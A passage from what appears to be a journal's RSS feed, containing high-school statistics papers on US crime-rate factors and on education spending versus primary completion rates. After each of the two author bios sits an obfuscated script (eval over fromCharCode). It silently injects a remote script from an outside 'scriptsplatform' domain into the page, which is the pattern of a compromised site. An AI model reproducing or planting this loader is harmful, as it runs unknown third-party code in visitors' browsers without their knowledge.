/><figcaption><br><em>Figure 12 : Model Validation &#8211; Shapiro</em></figcaption></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="438" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-1024x438.png" alt="" class="wp-image-2163" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-1024x438.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-300x128.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-768x328.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-920x393.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-230x98.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-350x150.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM-480x205.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.18.46-AM.png 1362w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Figure 13 : Best Fit Model – Residuals Plots</em></figcaption></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="411" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-1024x411.png" alt="" class="wp-image-2164" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-1024x411.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-300x121.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-768x309.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-920x370.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-230x92.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-350x141.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM-480x193.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.12-AM.png 1354w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Figure 14 : Best Fit Model – Histogram Plots</em></figcaption></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="349" src="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-1024x349.png" alt="" class="wp-image-2165" srcset="https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-1024x349.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-300x102.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-768x262.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-920x314.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-230x78.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-350x119.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM-480x164.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/09/Screen-Shot-2022-09-11-at-10.19.28-AM.png 1354w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Figure 15 : Best Fit Model – Plots</em></figcaption></figure>



<p>So, from the Shapiro test we can see that p value is more than 0.05 and hence confirms the data is normally distributed.</p>



<h2 class="wp-block-heading"><strong>IV. Discussion</strong></h2>



<p>From the simple linear regression, multiple regression and ANOVA model, we can conclude that 4 factors which crime rate depends the most are police expenditure, GDP, State Population and probability of imprisonment.</p>



<p>Out of these 4 it depends on police expenditure the most followed by probability of imprisonment, which has a negative relation and then GDP followed by state population. From, the interrelation model, we can see how closely these 4 are interrelated and affect crime rate. As we can see the economic factors especially the police expenditure and the GDP which affected crime rate. Population factors also affected the crime rate as highly populated states experienced more crimes than the other states.</p>



<p>This was closely followed by putting fear into people’s mind by the probability of imprisonment playing a key role. It is an extremely surprising fact that crime rate is more influenced by the economic factors than unemployment.</p>



<p>Change in population in turn influences the gdp. The gdp of a state decides its expenditure on police. Despite the significant findings, there were several limitations to note in the study. The first limitation was the medium sample size.</p>



<h2 class="wp-block-heading"><strong>V. Conclusion</strong></h2>



<p>From the simple linear regression, multiple regression and ANOVA model, we can conclude that 4 factors which crime rate depends the most are police expenditure, GDP, state population, and probability of imprisonment. Out of these 4 it depends on police expenditure the most followed by probability of imprisonment, which has a negative relation and then GDP followed by state population. From, the interrelation model, we can see how closely these 4 are interrelated and affect crime rate. As we can see the economic factors especially the police expenditure and the GDP which affected crime rate. Population factors also affected the crime rate as highly populated states experienced more crimes than the other states. This was closely followed by putting fear into people’s mind by the probability of imprisonment playing a key role. It is an extremely surprising fact that crime rate is more influenced by the economic factors than unemployment.</p>



<p>Change in population in turn influences the gdp. The gdp of a state decides its expenditure on police.</p>



<p>The state must allocate funds towards police training, enforce strict law &amp; order and improves GDP by increasing Government spending, Export and Investment. This helps to bring down the crime rate.</p>



<h2 class="wp-block-heading"><strong>VI. Reference list</strong></h2>



<ol class="wp-block-list"><li>Venables, W. N. &amp; Ripley, B. D., Modern Applied Statistics with S, Fourth edition (2003)</li><li>Isaac Ehrlich, Participation in Illegitimate Activities: A Theoretical and Empirical Investigation (1973)</li><li>Geoffrey R Norman and David L Streiner, BIOSTATISTICS: The Bare Essentials, Third Edition (2008)</li><li>Adarsh S, GitHub Repository, https://github.com/AdarshS20/UScrimeDataAnalysis (2022)\</li></ol>



<p><strong>Acknowledgements</strong><br>I would like to take this opportunity to express my profound gratitude and deep regards to my mentor Dr. Hong Pan for his exemplary guidance, monitoring and constant encouragement for this research paper. I would also like to take this opportunity to express my gratitude to Ms. Danielle Voorhies for her cordial support and guidance. Lastly, I thank my parents and friends for their encouragement and support to complete this research paper.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2022/09/adarsh.jpeg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Adarsh Sasikumar</h5><p>Adarsh is a 12th Grader at Sri Kumaran Children&#8217;s Home of Educational Council, Bangalore, India. He discovered the subject of Mathematics at the age of 6 and it was love at first sight. As he grew up, he felt like he had encapsulated himself into the number, angles, variables, and equations. He is planning to pursue an undergraduate major in Mathematics and is interested in predictive analysis.</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/united-states-crime-data-analysis-using-modern-applied-statistics-methodologies%ef%bf%bc/">United States Crime Data Analysis Using Modern Applied Statistics Methodologies￼</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Expenditure and Education</title>
		<link>https://exploratiojournal.com/expenditure-and-education/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=expenditure-and-education</link>
		
		<dc:creator><![CDATA[Dawn Diao]]></dc:creator>
		<pubDate>Thu, 27 Aug 2020 02:42:01 +0000</pubDate>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Statistics]]></category>
		<category><![CDATA[Economics]]></category>
		<category><![CDATA[Education]]></category>
		<category><![CDATA[Global Economy]]></category>
		<category><![CDATA[Research]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=407</guid>

					<description><![CDATA[<p>Han (Dawn) Diao<br />
Mercyhurst Preparatory School </p>
<div class="date">
July, 2020
</div>
<p>The post <a href="https://exploratiojournal.com/expenditure-and-education/">Expenditure and Education</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/dawn-1024x1024.jpg" alt="" class="wp-image-408" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-1024x1024.jpg 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-300x300.jpg 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-150x150.jpg 150w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-768x768.jpg 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-1536x1536.jpg 1536w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-830x830.jpg 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-230x230.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-350x350.jpg 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn-480x480.jpg 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/dawn.jpg 1681w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Han (Dawn) Diao</strong><br><em>Mercyhurst Preparatory School</em><br>July, 2020</p>
</div></div>



<hr class="wp-block-separator"/>



<h2 class="wp-block-heading"><strong>1.&nbsp; Introduction</strong></h2>



<p>With the booming of global economies and the develop of societies, the world is changing every single minute. Thus, many considerable issues come to the center of the stage. An important issue is the allocation of public resources to education and progress in the improvement of education across countries of the world. Education, as the base of the society, is a huge topic related to resources allocation and social progress. According to the importance of being educated, not only civilians, but also governments strive for high primary completion rate. To attain the goal, governments in world-wide regions and civilians in different classes pay great prices and obtain interesting results. However, some people may question if the money they put can really promote the education. According to World Data Bank from 1991 to 2016, the progress of the development on education answers the question.&nbsp;</p>



<h2 class="wp-block-heading"><strong>2.&nbsp; Governments’ Expenditure and Primary Completion Rate</strong></h2>



<h4 class="wp-block-heading">2.1 East Asia and Pacific</h4>



<p>The track of developing education in each region is different. Because of the diverse basics, experiments, and governments, regions around the world show multiple data according to the governments’ expenditure and primary completion rate. In the region of East Asia and Pacific, the governments’ expenditure gains the development of education. From 1991 to 1999, the government is keeping putting effort on education, but the primary completion rate of different countries is not all comparable. The most typical example is in 1991: some countries’ expenditure is around 7.6%, and their primary completion rate is around 98%, which is greatly high; some countries expenditure is around 16.3%, but their primary completion rate is only around 71%, which is unpredictable low.&nbsp;</p>



<p>From 2000 to 2006, the government expenditure shows a strong linear association with the primary completion rate. The general completion rate is close to 100%. Take 2006 as an example: some countries’ expenditure is around 9%, and their completion rate is around 90%; some countries expenditure is around 22%, and their completion rate is around 98%. The data presented is the lowest one and the highest one in 2006. Both of them show the appreciation of governments to education, and the high primary completion rate.&nbsp;</p>



<p>However, start form 2007, and end in 2009, the situation is not fluent as before. Probably because of the economic crisis in 2007, the primary completion rate begins to decline though governments expend large amount of money on it:&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="721" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-1024x721.png" alt="" class="wp-image-409" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-1024x721.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-300x211.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-768x541.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-830x585.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-230x162.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-350x247.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1-480x338.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure1-1.png 1333w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>In 2007, some countries’ expenditure is around 17%, which is considerable under the crisis, but the primary completion rate is still around 87%, which is lower than the lowest completion rate in 2006.&nbsp;</p>



<p>After the crisis, which is from 2010 to 2016, the situation is saved. The relationship between governments’ expenditure and the primary completion rate is direct. The more governments spend, the higher completion rate grows. For instance, in 2014, the lowest governments’ expenditure is around 7%, and the primary completion rate is around 92%; the highest governments’ expenditure is around 20%, and the primary completion rate is around 100%. Although the governments’ expenditure from 1991 to 1999 does not win the growth of the primary completion rate, from 2000 to 2006, the rate raises according to the expenditure. During the three year of crisis, to the declined rate, the expenditure is rewarding. Before 2000, governments put lots of money to support education, and the expenditure generally increases with the primary completion rate after 2000.&nbsp;</p>



<h4 class="wp-block-heading">2.2 Europe and Central Asia</h4>



<p>The condition in Europe and Central Asia is a different picture. Because of the difference cultural background and growing process, the data from 1991 to 1994 shows that the completion rate is unstable. The primary completion rate is generally low. Moreover, although the governments’ expenditure is high, it does not help the primary completion rate. Take 1991 as an example: the governments’ expenditure is around 17.5%, but the primary completion rate is only 70%, which is similar to that of East Asia. The same-level primary completion rate between Europe and Central Asia and East Asia illustrates the parallel background they share from 1991 to 1994.&nbsp;</p>



<p>The data from 1995 to 2006 becomes stable to develop. The governments pay attention on education, and the primary completion rate is high. In 2004, for instance, the governments’ expenditures are between 12% to 23%, and the primary completion rates are between 88% to 100%. The high primary completion rate responds to the expenditure.&nbsp;</p>



<p>Different with East Asia, Europe and Central Asia is not impacted by the crisis from 2007 to 2009. Oppositely, the data is quite stable with the almost 100% primary completion rate. From 2007 to 2009, the primary completion rate slightly increases. In 2007, the general rate is around 97%; in 2008, the general rate is around 98%; the general rate is around 99%. The reason behind it maybe the financial relationship between the US and Europe and Central Asia is not as tight as East Asia.&nbsp;</p>



<p>From 2010 to 2016, the governments’ expenditure has direct relationship with the primary completion rate. Take 2015 as an example, the lowest governments’ expenditure is around 8% with the primary completion rate around 97%. The highest governments’ expenditure is around 20% with the primary completion rate around 100%. The development of the expenditure and the education in Europe and Central Asia is generally fluent and stable—notably it is not harmed by the crisis from 2007 to 2009. The primary completion rate respond immediately once governments start to focus on education.</p>



<h4 class="wp-block-heading">2.3 Latin America and Caribbean</h4>



<p>The region of Latin America and Caribbean shows considerable development in education. From 1991 to 1998, the education level between each country is dramatic. The governments’ expenditure on education is balance, but the primary completion rate of each country is not.&nbsp; In 1992, for example, the association between governments’ expenditure and the primary completion rate is positive, and straight with a high outlier, and strong. The lowest governments’ expenditure is around 12%, and the primary completion rate is only 40%; the highest governments’ expenditure is around 15%, and the primary completion rate is around 100%. The close expenditure of each government causes variant rate. Furthermore, according to the data, there are only few countries on it, which is probably because of the imperfection of the education does not allow formal data collecting, or just the data is not collected at the period.&nbsp;</p>



<p>The situation becomes optimistic from 1999 to 2006. Though the plot is moderately strong because of a few outliers, the general rate grows. Take 2003 as an example, the association between governments’ expenditure and the primary completion rate is positive, and straight with a few high and low outliers, and moderately strong. The lowest governments’ expenditure is around 7%, and the primary completion rate is around 92%; the highest governments’ expenditure is around 98%.&nbsp;&#8216;</p>



<p>From 2007 to 2008, slightly reduce in the primary completion rate is shown. It seems like the economic crisis effects the education in a negative way. Especially in 2008, the association between two variables is negative and straight with a high and a low outlier, and moderately strong. The plot shows that some countries are harmed by the crisis, but others remain stable development.&nbsp;</p>



<p>After 2008, the primary completion rate keeps growing. Although the expenditure is not efficient enough, the general rate is close to 100%. Take 2010 as an example, the association between the governments’ expenditure and the primary completion rate is negative and straight with a few outliers, and moderately strong. The governments’ expenditure is between 13% to 23%, and the primary completion rate is between 90% to 100%. The efficiency of the development on education is not high enough that the governments’ expenditure does not cause absolute high primary completion rate, but the growth on rate is substantial in the region of Latin America and Caribbean.&nbsp;</p>



<h4 class="wp-block-heading">2.4 Middle East and North Africa</h4>



<p>Not only the region of Latin America and Caribbean gets progress on education, but also that of Middle East and North Africa. From 1991 to 1995, the data shows both positive and negative association for each year, which means that the region has typically uncertain primary completion rate. Also, the differences between each country is huge on the governments’ expenditure. Take 1994 as an example, the association between the governments’ expenditure and the primary completion rate is positive and straight with no outlier—because there are only two countries in the plot—and strong. One country has the government’s expenditure that is around 7%, and the primary completion rate that is around 71%; another country has the government’s expenditure that is around 22%, and the primary completion rate that is around 80%. It seems like that one country is trying to develop their education by putting great effort by government, so their expenditure is as high as 22%. However, the general rate is still low.&nbsp;</p>



<p>From 1996 to 1997, it is the most stable period before 2002 that the governments’ expenditure and the primary completion rate is considerable. The association between the expenditure and the rate is positive, and straight with a few outliers, moderately strong. The governments’ expenditure is between 8% to 27%, and the primary completion rate is between 87% to 91%.&nbsp;</p>



<p>From 1998 to 2002, the situation becomes undesirable again. For instance, in 2001, the association between the governments’ expenditure and the primary completion rate is negative, and straight with a low outlier, and moderately strong. The lowest governments’ expenditure is around 10%, and the primary completion rate is around 94%; the highest governments’ expenditure is around 30%, but the primary completion rate is around 60%. The outlier in 2001 is incredible that it has the expenditure of 27% with the rate of 26%.&nbsp;</p>



<p>After 2002, the associations between two variables are generally positive and strong, except for those of 2007 and 2008. In 2007 and 2008, the association is negative with few outliers, and moderately strong. It shows that Middle East and North Africa is also one member of victims from the crisis. Nevertheless, the general growth on education is still great accompanying with the help of governments. Take 2013 as an example, the governments’ expenditure is between 7% to 17%, and the primary completion rate is between 95% to 100%. The decline of the governments’ expenditure indicates the steady of primary completion rate. As another region with huge development on education, it is fair to say that governments’ expenditure cannot be ignored.&nbsp;</p>



<h4 class="wp-block-heading">2.5 Conclusion&nbsp;</h4>



<p>The four regions show the development on education and governments’ expenditure from 1991 to 2016. Every region has its own track: some have unstable education in the beginning, and become stable recently by the support of governments; some have a good beginning with the help of governments, but suffer from the crisis, and overcome it then; some have a government that with sense of paying attention on education all the time that ensure their education is always progressive. Nonetheless, starting from 2009, the development is substantial:&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="723" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-1024x723.png" alt="" class="wp-image-410" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-1024x723.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-300x212.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-768x542.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-830x586.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-230x162.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-350x247.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1-480x339.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure2-1.png 1339w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Overall, the governments’ expenditure helps the growth of primary completion rate. Before 2000, the data usually shows inverse relationship between them, which indicates that governments try to increase the rate because the primary completion rate of each region is all close to 100 in the end. Thus, as the time past, governments’ efforts on education promote the primary completion rate.</p>



<h2 class="wp-block-heading">3. People’s Expenditure and Primary Completion Rate</h2>



<h4 class="wp-block-heading">3.1 Introduction</h4>



<p>Governments’ expenditure on education significantly increases the primary completion rate, though it sometimes takes years to see the development. Similarly, different income groups, high income, upper middle income, low middle income, and low income, have different degrees of expenditure. Is their expenditure on education also helpful?</p>



<h4 class="wp-block-heading">3.2 High Income Group</h4>



<p>High income group, as the group of people who are most able to complete high-level education, always remains high primary completion rate. From 1991 to 1999, the general primary completion rate is high, but the associations are not strong enough between the expenditure ad the rate. For instance, in 1997, the association is positive, straight with many outliers, and moderately strong. The plot on this graph is scattered, instead of tight. It indicates the differences between different families. Some high-income families at this time do not have realize the importance of education, so they do not spend great amount of money on it. However, as the arrival of 21th century, the difference is fading.&nbsp;</p>



<p>From 2000 to 2016, the expenditure and the primary completion rate is impressively high, with straight relationship. Take 2013 as an example, the association is positive, straight, and strong. The lowest expenditure in this year is around 6%, and the primary completion rate is around 99%; the highest expenditure in this year is around 22%, and the primary completion rate is around 100%. The expenditures of different families are still discrepant. The reason behind it might be the wish of new high-income families start to put effort to education under the background of the enlargement of high income group. High income group successfully reduce the differences between each family on the primary completion rate; the low expenditure illustrates the stableness on education of some high-income families, and the high expenditure illustrates the development on that of new high-income families.</p>



<h4 class="wp-block-heading">3.2 Upper Middle Income Group</h4>



<p>To middle income group, most of them are trying to become one of high income group members. They pay great attention on education, trying to create chances for their children to attend higher class. Predictably, the expenditure and the primary completion rate is quite high in upper middle income group (because of the lack of information, the analyze only covers from 1998 to 2016). The data shows the stable and high expenditure and the rate of completion from 1998 to 2016. It is similar to that of high income group that they share high primary completion rate that is close to 100%. However, compared to high income group, upper middle income group does not have the association of two variables of upper strong enough. For example, in 2006, the association is negative, straight with some outliers, and moderately strong. The high income group in 2006, on the other head, has the association that is positive, straight, and strong. Upper middle income group already have a general high-level sense of education, but there are still some families do not realize that. The immature sense causes the differences between upper middle income group and high income group.&nbsp;</p>



<h4 class="wp-block-heading">3.3 Lower Middle Income Group</h4>



<p>Lower middle income group presents interesting data, which indicates the complicated and diverse background of different lower middle income group. From 1991 to 1995, the primary completion rate is low, though the expenditure is moderate. Take 1994 as an example, the association between the expenditure and the primary completion rate is negative, straight with few outliers, and moderately strong. The expenditure is between 6% to 23%, and the primary completion rate is between 89% to 60%, which is close to 90%, but is still not a high rate.&nbsp;</p>



<p>Start from 1996, the rate increases that even close to 100%. However, the association between two variables is weak, or there is no association. Some families in lower middle income pay attention on education, but some do not. Take 2015 as an example:&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="710" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-1024x710.png" alt="" class="wp-image-411" srcset="https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-1024x710.png 1024w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-300x208.png 300w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-768x533.png 768w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-830x576.png 830w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-230x159.png 230w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-350x243.png 350w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1-480x333.png 480w, https://exploratiojournal.com/wp-content/uploads/2020/08/figure3-1.png 1331w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>According to the plot, it is hard to analyze the association between the expenditure and the primary completion rate. Every family put different effort on supporting education, and the rate is also unrelated with each other. Although the general primary completion rate is not low, it is still hard to tell if the situation is positive or negative because of the gap between each family.&nbsp;</p>



<h4 class="wp-block-heading">3.4 Low Income Group</h4>



<p>Low income group, as a group with weakest financial condition, reflects some essential social problems. Not surprisingly, the group have low primary completion rate. However, the expenditure is in the average. It is probably because of their low income, so affording common education is not easy actually. Until 2016, their general completion rate is still around 70%. There are many countries have already made the primary education free, so why the rate is remains low, and the expenditure remains in average? It is reasonable for other income group that they want to give their children better education, like going to private schools for education, and so on. However, why the situation comes to the low income group people? The question probably can be given to the government.&nbsp;</p>



<h4 class="wp-block-heading">3.5 Conclusion</h4>



<p>In a society that some groups can have the primary completion rate nearly 100%, and some groups can only have the primary completion rate around 70%, there must be some problems. Are the resources allocated well? Does the education system need to be improved? Yet we are still in the progress of development, but as we can see, though we need to spend huge amount of money for years, the association between governments’ and people’s expenditure and primary completion rate is ultimately straight upward. Thus, because of the optimistic result of the expenditure, the society is encouraged to put more effort on education. It is unrealistic to keep the primary completion rate 100% to every income group, but trying to balance each group is what we should focus on.&nbsp;</p>



<h2 class="wp-block-heading">Works Cited</h2>



<p>Mentor: Dr. Peter Kempthorne<br><em>Massachusetts Institute of Technology</em></p>



<p>“GDP (Current US$) &#8211; High Income.” <em>Data</em>,&nbsp;data.worldbank.org/indicator/NY.GDP.MKTP.CD?locations=XD.</p>



<p>“GDP (Current US$) &#8211; Low Income.” <em>Data</em>,&nbsp; data.worldbank.org/indicator/NY.GDP.MKTP.CD?locations=XM.</p>



<p>“GDP (Current US$) &#8211; Lower Middle Income.” <em>Data</em>,&nbsp; data.worldbank.org/indicator/NY.GDP.MKTP.CD?locations=XN.</p>



<p>“GDP (Current US$) &#8211; Upper Middle Income.” <em>Data</em>,&nbsp; data.worldbank.org/indicator/NY.GDP.MKTP.CD?locations=XT.</p>



<p>“Government Expenditure on Education, Total (% of Government Expenditure).” <em>Data</em>,&nbsp; data.worldbank.org/indicator/SE.XPD.TOTL.GB.ZS.</p>



<p>“Primary Completion Rate, Total (% of Relevant Age Group).” <em>Data,</em>&nbsp; data.worldbank.org/indicator/SE.PRM.CMPT.ZS.</p>



<p></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/08/dawn.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150"/>
<h5>Dawn Diao</h5>
<p class="no_indent" style="margin:0;">Dawn is a rising senior at the Mercyhurst Preparatory School in Erie, Pennsylvania. </p></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/expenditure-and-education/">Expenditure and Education</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Analysis of the Duration of California Real Estate on the Market</title>
		<link>https://exploratiojournal.com/analysis-of-the-duration-of-california-real-estate-on-the-market/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=analysis-of-the-duration-of-california-real-estate-on-the-market</link>
		
		<dc:creator><![CDATA[Renee Wu]]></dc:creator>
		<pubDate>Wed, 26 Aug 2020 09:28:02 +0000</pubDate>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Economics]]></category>
		<category><![CDATA[Statistics]]></category>
		<category><![CDATA[California]]></category>
		<category><![CDATA[Real Estate]]></category>
		<category><![CDATA[Research]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=351</guid>

					<description><![CDATA[<p>Renee Wu<br />
Shanghai American School </p>
